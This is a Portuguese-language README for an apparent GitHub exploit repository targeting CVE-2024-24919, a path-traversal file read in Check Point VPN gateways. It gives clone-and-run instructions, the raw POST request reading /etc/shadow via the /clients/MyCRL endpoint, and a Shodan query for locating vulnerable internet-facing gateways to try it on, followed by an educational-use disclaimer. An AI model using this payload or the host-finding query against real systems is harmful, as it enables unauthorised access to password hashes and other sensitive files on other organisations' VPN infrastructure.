
CVE-2024-24919 Exploit e PoC - LFI Crítico para VPN de Acesso Remoto ou Acesso Móvel.
Este repositório contém um exploit em python para o CVE-2024-24919, uma vulnerabilidade que permite ler arquivos sensíveis da página vulnerável.
Este exploit primeiro verifica se o alvo é vulnerável e, em seguida, obtém o caminho que você especificar.
Severidade: Crítica
Primeiro, clone o repositório:
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit
Dê permissões e execute o exploit com python3
chmod +x exploit.py
python3 exploit.py
Em seguida, siga os passos e você obterá os dados do arquivo que especificar.
Se estiver com dificuldades, certifique-se de que a URL especificada é a principal.
✓ https://google.com
✘ https://google.com/search?client=firefox
Primeiro, precisamos garantir que o site tenha Check Point Security Gateways com VPN de acesso remoto ou software de acesso móvel habilitado.
Neste exploit, estamos apontando para o endpoint {ip}/clients/MyCRL.
Este endpoint é vulnerável se fizermos uma requisição POST, adicionamos a string CSHELL/ e o caminho do arquivo que queremos ler usando um Path Traversal.
A requisição será algo como:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
Obtemos tudo isso olhando o código fonte.
Para mais informações sobre o processo, confira este post --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
Se você quiser testar essa vulnerabilidade, pode usar o Sodan para encontrar alguns sites vulneráveis, usando esta consulta no sodan
Server: “Check Point SVN Foundation”
https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919
Este script é apenas para fins educacionais. Use-o com responsabilidade e apenas em sistemas para os quais você tenha permissão de acesso.